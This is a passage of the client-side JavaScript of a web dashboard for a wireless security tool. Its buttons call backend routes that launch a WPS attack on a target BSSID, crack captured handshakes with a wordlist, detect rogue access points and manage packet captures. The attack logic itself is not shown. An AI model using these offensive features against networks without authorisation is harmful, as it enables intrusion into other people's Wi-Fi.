document.getElementById('wps-scan-results').innerHTML = html;
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiWpsAttack(bssid) {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
renderOutput('wps-output', 'Starting WPS attack on ' + bssid + '...');
|
||||
postJSON('/wifi/wps-attack', {interface: iface, bssid: bssid}).then(function(data) {
|
||||
renderOutput('wps-output', data.message || data.error || 'Done');
|
||||
});
|
||||
}
|
||||
|
||||
function wifiCrackHandshake() {
|
||||
var file = document.getElementById('crack-file').value.trim();
|
||||
var wordlist = document.getElementById('crack-wordlist').value.trim();
|
||||
if (!file || !wordlist) { alert('Provide both capture file and wordlist paths.'); return; }
|
||||
var btn = document.getElementById('btn-crack');
|
||||
setLoading(btn, true);
|
||||
renderOutput('crack-output', 'Cracking... this may take a while.');
|
||||
postJSON('/wifi/crack', {file: file, wordlist: wordlist}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('crack-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiSaveBaseline() {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var btn = document.getElementById('btn-baseline');
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/baseline', {interface: iface}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('rogue-output', data.message || data.error || 'Baseline saved');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiDetectRogue() {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var btn = document.getElementById('btn-detect-rogue');
|
||||
setLoading(btn, true);
|
||||
postJSON('/wifi/detect-rogue', {interface: iface}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('rogue-output', 'Error: ' + data.error); return; }
|
||||
var rogues = data.rogue_aps || [];
|
||||
if (!rogues.length) {
|
||||
renderOutput('rogue-output', 'No rogue access points detected. Environment clean.');
|
||||
return;
|
||||
}
|
||||
var lines = ['=== ROGUE APs DETECTED ==='];
|
||||
rogues.forEach(function(r) {
|
||||
lines.push('[!] BSSID: ' + r.bssid + ' SSID: ' + (r.ssid || '<hidden>')
|
||||
+ ' Channel: ' + r.channel + ' Reason: ' + (r.reason || 'unknown'));
|
||||
});
|
||||
renderOutput('rogue-output', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function wifiStartCapture() {
|
||||
var iface = wifiGetIface();
|
||||
if (!iface) { alert('Select a wireless interface first.'); return; }
|
||||
var filter = document.getElementById('cap-filter').value;
|
||||
renderOutput('cap-live-output', 'Starting packet capture...');
|
||||
postJSON('/wifi/packet-capture/start', {interface: iface, filter: filter}).then(function(data) {
|
||||
renderOutput('cap-live-output', data.message || data.error || 'Capture running');
|
||||
});
|
||||
}
|
||||
|
||||
function wifiStopPacketCapture() {
|
||||
postJSON('/wifi/packet-capture/stop', {}).then(function(data) {
|
||||
renderOutput('cap-live-output', data.message || data.error || 'Capture stopped');
|
||||
wifiListCaptures();
|
||||
});
|
||||
}
|
||||
|
||||
function wifiListCaptures() {
|
||||
fetchJSON('/wifi/captures').then(function(data) {
|
||||
if (data.error) { return; }
|
||||
var caps = data.captures || [];
|
||||
if (!caps.length) {
|
||||
document.getElementById('captures-list').innerHTML =
|
||||
'<tr><td colspan="4" class="empty-state">No saved captures.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
caps.forEach(function(c) {
|
||||
html += '<tr><td><code>' + esc(c.filename) + '</code></td>'
|
||||
+ '<td>' + esc(c.size || '--') + '</td>'
|
||||
+ '<td>' + esc(c.date || '--') + '</td>'
|
||||
+ '<td><button class="btn btn-small" onclick="wifiDownloadCapture(\''
|
||||
+ esc(c.filename) + '\')">Download</button> '
|
||||
+ '<button class="btn btn-danger btn-small" onclick="wifiDeleteCapture(\''
|
||||
+ esc(c.filename) + '\')">Delete</button></td></tr>';
|
||||
});
|
||||
document.getElementById('captures-list').innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function wifiDownloadCapture(filename) {
|
||||
window.open('/wifi/captures/download?file=' + encodeURIComponent(filename), '_blank');
|
||||
}
|
||||
|
||||
function wifiDeleteCapture(filename) {
|
||||
if (!confirm('Delete capture "' + filename + '"?')) return;
|
||||
postJSON('/wifi/captures/delete', {filename: filename}).then(function(data) {
|
||||
if (data.success) wifiListCaptures();
|
||||
});
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
Loading…
x
Reference in New Issue
Block a user